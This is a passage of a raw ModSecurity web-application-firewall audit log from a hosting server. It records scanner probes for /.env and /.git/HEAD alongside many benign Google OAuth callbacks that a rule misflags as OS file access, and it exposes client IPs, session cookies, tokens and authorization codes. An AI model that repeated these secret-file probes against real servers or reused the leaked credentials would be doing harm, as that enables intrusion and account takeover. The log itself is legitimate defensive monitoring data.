Server: nginx Date: Thu, 24 Jul 2025 06:22:14 GMT X-Powered-By: PHP/8.1.33, PleskLin Cache-Control: private, must-revalidate pragma: no-cache expires: -1 Set-Cookie: XSRF-TOKEN=wOqnKbTkXpbunpAt1srLemwpLnAtJjs7uwnEmpgJ; expires=Thu, 24-Jul-2025 08:22:14 GMT; Max-Age=7200; path=/, active_ecommerce_cms_session=7DhwctBuwehFAoZXg1JTw49PUWWF7GY1yRBhqc2H; expires=Thu, 24-Jul-2025 08:22:14 GMT; Max-Age=7200; path=/; httponly Vary: Accept-Encoding Content-Encoding: gzip --ef062047-F-- HTTP/1.1 403 Forbidden Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "31b-5dfc34833f116" Accept-Ranges: bytes Content-Length: 795 Content-Type: text/html --ef062047-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "limitless.jac.group"] [uri "/.env"] [unique_id "aIHRF1ooLYw4or2LgWIZFwAAAMY"] Apache-Error: [file "mod_access_compat.c"] [line 350] [level 3] AH01797: client denied by server configuration: /var/www/vhosts/jac.group/limitless.jac.group/.env Stopwatch: 1753338135888903 1970 (- - -) Stopwatch2: 1753338135888903 1970; combined=988, p1=743, p2=0, p3=0, p4=0, p5=245, sr=246, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef062047-Z-- --345ee052-A-- [24/Jul/2025:09:25:40.783457 +0300] aIHR5EdutIOpb_kg22iCSgAAABE 212.28.242.186 42290 127.0.0.1 7081 --345ee052-B-- GET /administration/index.php?code=4/0AVMBsJgdeo-BVR8XW2ZmZr1w0jY9GS8yzNFf22wh8qiOMrh2GCqSM3Y21Z963J9Vfqhs6g&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: ar-LB,ar;q=0.9,en-LB;q=0.8,en;q=0.7,en-US;q=0.6 priority: u=0, i cookie: PHPSESSID=tull8t6h7upgkrvn3f0a3fovd7 --345ee052-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --345ee052-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHR5EdutIOpb_kg22iCSgAAABE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753338340350822 432793 (- - -) Stopwatch2: 1753338340350822 432793; combined=4524, p1=576, p2=3631, p3=149, p4=53, p5=114, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --345ee052-Z-- --68cc3410-A-- [24/Jul/2025:09:27:15.788499 +0300] aIHSQ0dutIOpb_kg22iD9wAAAA8 37.120.138.8 58388 127.0.0.1 7081 --68cc3410-B-- GET /.git/HEAD HTTP/1.0 Host: jinansystem.com X-Real-IP: 37.120.138.8 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8 Accept-Language: en-US, en; q=0.5 --68cc3410-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --68cc3410-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "jinansystem.com"] [uri "/.git/HEAD"] [unique_id "aIHSQ0dutIOpb_kg22iD9wAAAA8"] Stopwatch: 1753338435782859 5736 (- - -) Stopwatch2: 1753338435782859 5736; combined=3645, p1=706, p2=2860, p3=0, p4=0, p5=79, sr=237, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --68cc3410-Z-- --d2725a1a-A-- [24/Jul/2025:09:27:17.031658 +0300] aIHSRUdutIOpb_kg22iEBwAAAAY 37.120.138.8 58516 127.0.0.1 7081 --d2725a1a-B-- GET /.git/HEAD HTTP/1.0 Host: jinansystem.com X-Real-IP: 37.120.138.8 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8 Accept-Language: en-US, en; q=0.5 --d2725a1a-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --d2725a1a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "jinansystem.com"] [uri "/.git/HEAD"] [unique_id "aIHSRUdutIOpb_kg22iEBwAAAAY"] Stopwatch: 1753338437027137 4591 (- - -) Stopwatch2: 1753338437027137 4591; combined=2453, p1=678, p2=1707, p3=0, p4=0, p5=68, sr=229, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2725a1a-Z-- --4e45780b-A-- [24/Jul/2025:09:27:40.609026 +0300] aIHSXEdutIOpb_kg22iE6wAAABU 212.28.242.186 35268 127.0.0.1 7081 --4e45780b-B-- GET /administration/index.php?code=4/0AVMBsJhj41n_DWl04PdmxMzr1KL5cAR5M73E9yap0tZCU-VMGRjqV9Z47J8ETwXyeTbgmQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=t61udbaa0pe42lb5cbaielo093 --4e45780b-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --4e45780b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHSXEdutIOpb_kg22iE6wAAABU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753338460181149 428044 (- - -) Stopwatch2: 1753338460181149 428044; combined=10835, p1=616, p2=9816, p3=204, p4=60, p5=138, sr=213, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e45780b-Z-- --e3adc519-A-- [24/Jul/2025:09:27:50.369122 +0300] aIHSZUdutIOpb_kg22iFTAAAABQ 141.105.87.197 53146 127.0.0.1 7081 --e3adc519-B-- GET /administration/index.php?code=4/0AVMBsJgLgsC-J_nFiJvtndRkc3pAFhAwF66K7kbyhRQKizdS1zQckwvRuFwdq9qQz_8-jg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 cookie: PHPSESSID=koe7okb9i9d8u01kick9br9md3 --e3adc519-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --e3adc519-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHSZUdutIOpb_kg22iFTAAAABQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753338469973020 396301 (- - -) Stopwatch2: 1753338469973020 396301; combined=4299, p1=465, p2=3462, p3=148, p4=71, p5=152, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e3adc519-Z-- --024df462-A-- [24/Jul/2025:09:30:04.546909 +0300] aIHS7EdutIOpb_kg22iILQAAAAg 195.112.198.68 44082 127.0.0.1 7081 --024df462-B-- GET /administration/index.php?code=4/0AVMBsJgjFeEK1wmD8UWj88FIiNqnC0EqUKXIVxKjFs8r2k0YxJLd0AHHriDuFH1jdhfHNg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=hvva38ip8a44f1aatti7dtm5l1 --024df462-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --024df462-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHS7EdutIOpb_kg22iILQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753338604083483 463638 (- - -) Stopwatch2: 1753338604083483 463638; combined=5394, p1=1010, p2=4015, p3=138, p4=61, p5=169, sr=246, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --024df462-Z-- --01ce583c-A-- [24/Jul/2025:09:32:52.887568 +0300] aIHTlBukk8cgt8UnU9rwPwAAAEs 212.28.242.186 37846 127.0.0.1 7081 --01ce583c-B-- GET /administration/index.php?code=4/0AVMBsJi4wk80tBOsc3k1OCqc509vF6oAWpiSWmjwq8eEQJkmz5iBXkdWTJWUAMza8Tgk-w&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=gnoeo0levn9m11qqbnq635ed16 --01ce583c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --01ce583c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHTlBukk8cgt8UnU9rwPwAAAEs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753338772440694 448809 (- - -) Stopwatch2: 1753338772440694 448809; combined=5114, p1=426, p2=4253, p3=151, p4=72, p5=211, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01ce583c-Z-- --4d6ee307-A-- [24/Jul/2025:09:41:33.442487 +0300] aIHVnRukk8cgt8UnU9r9EAAAAEA 77.90.153.170 40322 127.0.0.1 7081 --4d6ee307-B-- GET /.env HTTP/1.0 Host: sys.ellaith.com X-Real-IP: 77.90.153.170 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 Accept-Charset: utf-8 Accept-Encoding: gzip --4d6ee307-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=1ac428520ba4be1993efbc10560e2bc4; expires=Thu, 24 Jul 2025 07:42:33 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --4d6ee307-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.ellaith.com"] [uri "/.env"] [unique_id "aIHVnRukk8cgt8UnU9r9EAAAAEA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753339293370606 71990 (- - -) Stopwatch2: 1753339293370606 71990; combined=4210, p1=783, p2=3293, p3=0, p4=0, p5=133, sr=275, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4d6ee307-Z-- --3d75fb21-A-- [24/Jul/2025:09:45:52.850651 +0300] aIHWoBukk8cgt8UnU9oEFwAAAEg 77.90.153.170 58394 127.0.0.1 7081 --3d75fb21-B-- GET /.env HTTP/1.0 Host: test.kime.agency X-Real-IP: 77.90.153.170 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; NCE-AL00 Build/HUAWEINCE-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6904 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 Accept-Encoding: gzip --3d75fb21-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 25 Jan 2023 19:33:35 GMT ETag: "328-5f31bb5588323" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --3d75fb21-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.kime.agency"] [uri "/.env"] [unique_id "aIHWoBukk8cgt8UnU9oEFwAAAEg"] Stopwatch: 1753339552846486 4253 (- - -) Stopwatch2: 1753339552846486 4253; combined=2454, p1=571, p2=1814, p3=0, p4=0, p5=68, sr=139, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3d75fb21-Z-- --71bc5c22-A-- [24/Jul/2025:09:46:03.737252 +0300] aIHWq0dutIOpb_kg22iUbAAAABg 141.105.87.197 35532 127.0.0.1 7081 --71bc5c22-B-- GET /administration/index.php?code=4/0AVMBsJi9EWX9ElsAP2HDVYc9lyGi2hr3iwoPlVr4OHev9q4G0HOWExJqZzAqZfZdOe_zYg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; 